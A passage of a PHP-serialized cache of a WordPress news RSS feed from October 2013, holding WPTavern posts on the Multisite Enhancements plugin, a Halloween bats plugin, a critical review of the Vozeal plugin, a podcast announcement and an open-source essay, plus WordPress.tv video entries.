href=\"https://github.com/bueltge/WordPress-Multisite-Enhancements\" target=\"_blank\">github</a> for some time, which made it rather obscure. WordPress plugins hosted on github are often very difficult to find unless you already know about them or <a href=\"http://www.wptavern.com/how-to-install-wordpress-plugins-directly-from-github\" target=\"_blank\">know how to search them</a>. That&#8217;s why the WP Engineer team decided to add his plugin to the WordPress repository. <span id=\"more-10782\"></span></p>\n<p><a href=\"http://wordpress.org/plugins/multisite-enhancements/\" title=\"WordPress Multisite Enhancements plugin\" target=\"_blank\">Multisite Enhancements</a> includes many handy features that one might otherwise get by installing a dozen different plugins. Most of these additions fall within several major categories. Let&#8217;s break them down:</p>\n<h4>Enhanced Network Menus and Admin Features</h4>\n<ul>\n<li>Adds Blog and User ID in network view more</li>\n<li>Enables an &#8216;Add New&#8217; link under the Plugins menu for Network admins</li>\n<li>Adds several useful items to the multisite &#8216;Network Admin&#8217; admin bar</li>\n</ul>\n<p>The Multisite Enhancements plugin makes blog and user IDs easy to find in the dashboard. This makes life easier for admins working with themes and plugins that require IDs for configuration. </p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/blogid.png\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/blogid.png?resize=560%2C97\" alt=\"blogid\" class=\"aligncenter size-full wp-image-10793\" /></a></p>\n<p>Perhaps one of the most useful features of this plugin is the &#8220;Add New&#8221; plugins menu added to blogs for super admins. This saves quite a bit of time in network management:</p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/add-new-plugins.png\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/add-new-plugins.png?resize=436%2C378\" alt=\"add-new-plugins\" class=\"aligncenter size-full wp-image-10794\" /></a></p>\n<h4>Enhancements to Plugin Pages</h4>\n<ul>\n<li>On the network plugins page, show which blogs have this plugin active</li>\n<li>On the network theme page, show which blogs have the theme active</li>\n</ul>\n<p>The Multisite Enhancements plugin gives admins more insight into which blogs are using installed plugins and themes. This helps admins to know what extensions can be safely deactivated and/or deleted. </p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/active-plugins.png\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/active-plugins.png?resize=560%2C276\" alt=\"active-plugins\" class=\"aligncenter size-full wp-image-10797\" /></a></p>\n<h4>Network Branding</h4>\n<ul>\n<li>Adds favicon from theme folder to the admin area to more easily identify the blog. It uses the favicon.ico file in the theme folder of the active theme in each blog</li>\n<li>Removes the &#8216;W&#8217; logo and its sublinks in the admin bar</li>\n<li>Adds a Favicon to each blog on the admin bar &#8216;My Sites&#8217; menu</li>\n</ul>\n<p>This plugin brings the favicon into the admin area, helping admins visually identify blogs on the network. </p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/favicon.png\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/favicon.png?resize=430%2C207\" alt=\"favicon\" class=\"aligncenter size-full wp-image-10799\" /></a></p>\n<h4>Resource Monitoring</h4>\n<ul>\n<li>Change Admin footer text for administrators to quickly view current used RAM, SQL, RAM Version</li>\n</ul>\n<p>Multisite super admins usually bear the responsibility of keeping network performance at its best. Adding these stats to the footer helps admins monitor resources available to the network.</p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/resources.png\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/resources.png?resize=416%2C48\" alt=\"resources\" class=\"aligncenter size-full wp-image-10801\" /></a></p>\n<h4>Extra Functions</h4>\n<p>Depending on what version of WordPress your network is running, there are some extra functions available through the Multisite Enhancements plugin:</p>\n<ul>\n<li>The function <a href=\"http://codex.wordpress.org/WPMU_Functions/get_blog_list\" target=\"_blank\">get_blog_list()</a> is currently deprecated in the WP Core but currently usable. The plugin checks this and get an alternative in <em>inc/autoload/core.php</em></li>\n<li>If you develop with the alternative to this function, then you can use the method get_blog_list() in class Multisite_Core. It also uses caching with the Transient API. Read more about the function in <em>inc/autoload/class-core.php</em>.</li>\n<li>If you use WordPress version 3.7 and higher, check out the <a href=\"http://codex.wordpress.org/Function_Reference/wp_get_sites\" target=\"_blank\">wp_get_sites()</a> function. This is the new alternative function inside the core to get all sites inside the network. The function accepts an array with arguments.</li>\n</ul>\n<p>The Multsite Enhancements plugin enables you to manage your network more efficiently. It&#8217;s compatible with WordPress 3.7 and even works with 3.8-alpha. <a href=\"http://wordpress.org/plugins/multisite-enhancements/\" target=\"_blank\">Download</a> it for free from wordpress.org via your dashboard. </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/-ePUQn-z2mA\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 23:44:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"WPTavern: This Week On WPWeekly: Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"http://feedproxy.google.com/~r/WordpressTavern/~3/kXHemsHQjaM/this-week-on-wpweekly-cory-miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2159:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ithemeslogo2.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/ithemeslogo2.jpg?resize=255%2C53\" alt=\"iThemes logo 2\" class=\"alignright size-full wp-image-10776\" /></a>This week on WordPress Weekly, our special guest will be Cory Miller of iThemes.com. I first met Cory back in 2008 at WordCamp Dallas which was my first WordCamp event that I attended. At that time, iThemes was a brand new company looking to innovate the commercial WordPress theme space. They made a lot of progress during 2009 but at one point, it seemed as though <a href=\"http://www.wptavern.com/ithemes-responds-to-speculation-all-is-well\" title=\"http://www.wptavern.com/ithemes-responds-to-speculation-all-is-well\">the company began to stagnate</a>. <span id=\"more-10753\"></span></p>\n<p>Cory used the company blog to personally address the concerns raised throughout the WordPress community and assured everyone that they would be continuing to innovate and push the boundaries of WordPress. A few years later, they launched <a href=\"http://ithemes.com/find/plugins\" title=\"http://ithemes.com/find/plugins\">PluginBuddy</a>, acquired <a href=\"http://webdesign.com/\" title=\"http://webdesign.com/\">Webdesign.com</a>, <a href=\"http://ithemes.com/purchase/builder-theme/\" title=\"http://ithemes.com/purchase/builder-theme/\">Builder</a>, and finally, <a href=\"http://ithemes.com/exchange/\" title=\"http://ithemes.com/exchange/\">Exchange</a>.</p>\n<p>Cory has managed to successfully transition the company. They are now much more than just a commercial theme seller. On this weeks show, we&#8217;ll be traveling through time, starting with the launch of iThemes and working our way to the present. I encourage you to listen live, this Friday at 3PM Eastern via the <a href=\"http://www.wptavern.com/wordpress-weekly\" title=\"http://www.wptavern.com/wordpress-weekly\">WPTavern Podcast page</a>. If you have any questions you&#8217;d like me to ask Cory, leave them in the comments.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/kXHemsHQjaM\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 19:30:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: How To Add Flying Halloween Bats To Your WordPress Site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10769\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://feedproxy.google.com/~r/WordpressTavern/~3/xknnUi5YfuU/how-to-add-flying-halloween-bats-to-your-wordpress-site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1804:\"<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/DWHalloweenBats.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/DWHalloweenBats.jpg?resize=150%2C150\" alt=\"DW Halloween Bats\" class=\"alignright size-thumbnail wp-image-10771\" /></a>First off, happy Halloween to those that celebrate it! If you&#8217;re looking to add a bit of spookiness to your site, you should check out the <a href=\"http://wordpress.org/plugins/dw-halloween/\" title=\"http://wordpress.org/plugins/dw-halloween/\">DW Halloween plugin</a> by the Designwall Team. This plugin adds a custom post type called Pumkins. There are seven different flying pumpkins to choose from such as Joker Joomla, Mr DPumpkin, and Skull Druplicon. Each pumkin can be configured to display a message when a visitor hovers their mouse over the flying bat.</p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/DWHalloweenSettings.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/DWHalloweenSettings.jpg?resize=500%2C264\" alt=\"DW Halloween Plugin Settings\" class=\"aligncenter size-large wp-image-10773\" /></a></p>\n<p>You can configure the bats with a number of parameters such as the image size, animation type, animation speed, wing speed, pause time, delay time, frame start, whether the image can be closed and finally, a custom CSS class. My recommendation is to allow visitors to close the flying bat in case they consider it a nuisance. Hat tip to <a href=\"https://twitter.com/williamsba/status/395940561104166912\" title=\"https://twitter.com/williamsba/status/395940561104166912\">Brad Williams</a> for sharing this plugin.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/xknnUi5YfuU\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 18:30:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WPTavern: Plugin Review: Vozeal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10750\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://feedproxy.google.com/~r/WordpressTavern/~3/g7v7gjfr_fs/plugin-review-vozeal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4731:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/vozeallogo.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/vozeallogo.jpg?resize=191%2C53\" alt=\"Vozeal Logo\" class=\"alignright size-full wp-image-10751\" /></a>At a local WordPress meetup I attended, an attendee asked what would be the best way to show videos on their site? We dismissed using YouTube because when the video ends, it would most likely show video suggestions that had nothing to do with the topic at hand. We recommended that he use <a>Vimeo</a>. Earlier this week, I was contacted by the developers of a plugin called <a href=\"http://vozeal.com/\" title=\"http://vozeal.com/\">Vozeal</a> that based on their pitch to me, would solve the problem of YouTube videos recommending videos outside of the user&#8217;s channel. I gave it a shot and this was my experience. <span id=\"more-10750\"></span></p>\n</h3>\n<p>Normally when someone pitches me a plugin to review, I expect everything in the plugin as well as the website to work correctly. The only time I don&#8217;t expect that is when the plugin is in beta along with the company&#8217;s website. Before I continue the review, I want you to read the pitch I received.</p>\n<blockquote><p>I am co-founder of Vozeal. We give bloggers technology to better engage their audience. We have developed plugins for bloggers to change the youtube suggestions that come. Our plugin ensures that all the suggestion appear from publisher&#8217;s own youtube channel. We are rolling out with blogs like sportskeeda.com, phandroid.com, indiatimes.com on board.</p>\n<p>We would love to get a review from you guys</p></blockquote>\n<h3>Plugin Doesn&#8217;t Deliver</h3>\n<p>The first thing I did was check out <a href=\"http://vozeal.com/index.html\" title=\"http://vozeal.com/index.html\">their website</a>. Their site delivers the bare minimum of information needed to figure out what their plugin does. However, I couldn&#8217;t find any information on their website dedicated to their WordPress plugin until I browsed their footer. This is where I found a link to their blog with a post from September explaining how to install their plugin. </p>\n<p>The plugin is very easy to install and only contains one setting. In order to use it, you&#8217;ll need an authorization key that is provided after you signup to their website. Their sign up form looks like this.</p>\n<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview2.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview2.jpg?resize=227%2C300\" alt=\"Vozeal Signup Page\" class=\"aligncenter size-medium wp-image-10757\" /></a></p>\n<p>After registering, I didn&#8217;t receive the typical email that accompanies signing up to a website. I did receive a block of code that I was supposed to add to any template file I wanted the widget to show up on. I added the code to a standard Text widget and nothing showed up.</p>\n<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview1.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview1.jpg?resize=396%2C236\" alt=\"Vozeal Authorization Key\" class=\"aligncenter size-full wp-image-10755\" /></a></p>\n<p>At this point, I have no idea what&#8217;s going on. So I visit the Vozeal website and click on the link that states, <a href=\"http://vozeal.com/index.html#login-box3\" title=\"http://vozeal.com/index.html#login-box3\">Click Here to Know How Vozeal Work!</a>. Unfortunately, that doesn&#8217;t provide much help. In fact, this is what I see. </p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview3.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/Vozealpluginreview3.jpg?resize=300%2C176\" alt=\"Vozeal Help Video No Shows\" class=\"aligncenter size-medium wp-image-10759\" /></a></p>\n<h3>Conclusion</h3>\n<p>At this point, I give up. There is no sense in continuing. Nothing shows up when I put the code into a text widget and it&#8217;s clear that the Vozeal website needs a lot of work. The statement about this plugin that interested me the most was, <em>our plugin ensures that all the suggestions appear from publisher&#8217;s own youtube channel</em>. This is a feature that would be helpful to a lot of people, especially to those that publish their Google Hangout recordings. At this time, I recommend avoiding Vozeal at all costs until they get their plugin, and especially their website under control.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/g7v7gjfr_fs\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 18:00:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WPTavern: What WordPress Taught Me About Open Source\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10762\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"http://feedproxy.google.com/~r/WordpressTavern/~3/7yoq6FKFs80/what-wordpress-taught-me-about-open-source\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2554:\"<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2009/02/wordpresslogo.png\" rel=\"thumbnail\"><img class=\"alignright size-thumbnail wp-image-422\" alt=\"WordPress Logo\" src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2009/02/wordpresslogo.png?resize=150%2C150\" /></a>Fifteen years ago, I was living life as a teenager. I didn&#8217;t play sports in high school nor did the typical things high school kids do. Instead, I was a computer junky or a nerd as some people called me. I had my very own computer handed down to me from my dad. An AMD K6-2 350MHz Processor with 128 megs of ram. Terrible compared to the Pentium 2 that was in the Gateway box, but I digress. <span id=\"more-10762\"></span></p>\n<p>I didn&#8217;t know very much about open source software back then. To me, open source software meant that it was vastly inferior to whatever paid software was available to accomplish a task. This was also known as crapware. I also understood open source to mean free. Free as in beer. Instead of using open source software, I routinely found myself paying chunks of money for software that had a dedicated development team and was usually easier to install and use. Open source software usually came packaged in <a title=\"http://en.wikipedia.org/wiki/Tarball\" href=\"http://en.wikipedia.org/wiki/Tarball\">Tarballs</a> with complicated instructions on how to install it.</p>\n<p>It wasn&#8217;t until a few years later when I discovered Joomla and then WordPress when I started to understand what open source was really all about. WordPress taught me the following things.</p>\n<ul>\n<li>Open source software doesn&#8217;t have to be free of charge</li>\n<li>Licenses are the foundations in which code is built and distributed</li>\n<li>Passionate people will volunteer their days and nights to squash bugs so the project gets better</li>\n<li>Open source is a global initiative</li>\n<li>People can make an incredible living around open source software</li>\n<li>When things are going right, the sense of community is overwhelmingly awesome</li>\n<li>Improving the project is a goal most people can get behind</li>\n<li>Open source provides opportunities that otherwise might not have existed</li>\n</ul>\n<p>Everything I know about the open source topic is based on my experience with using WordPress and participating in the WordPress community. I&#8217;d love to hear from others who grew up learning about open source the same way I did.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/7yoq6FKFs80\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 16:54:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WordPress.tv: Panel Discussion: Running A WordPress Development Business\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24570\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wordpress.tv/2013/10/31/panel-discussion-running-a-wordpress-development-business/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:693:\"<div id=\"v-0O3GLBRI-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24570/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24570/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24570&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/31/panel-discussion-running-a-wordpress-development-business/\"><img alt=\"Panel Discussion: Running A WordPress Development Business\" src=\"http://videos.videopress.com/0O3GLBRI/video-083e83087b_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 10:05:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WordPress.tv: Ross Jones: The Best SEO Plugin For WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24555\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wordpress.tv/2013/10/31/ross-jones-the-best-seo-plugin-for-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:667:\"<div id=\"v-aBTz384o-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24555/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24555/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24555&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/31/ross-jones-the-best-seo-plugin-for-wordpress/\"><img alt=\"Ross Jones: The Best SEO Plugin For WordPress\" src=\"http://videos.videopress.com/aBTz384o/video-18ad5b45a4_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2013 10:04:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WordPress.tv: Todd O’Neill: What’s Content Strategy and Why Should I 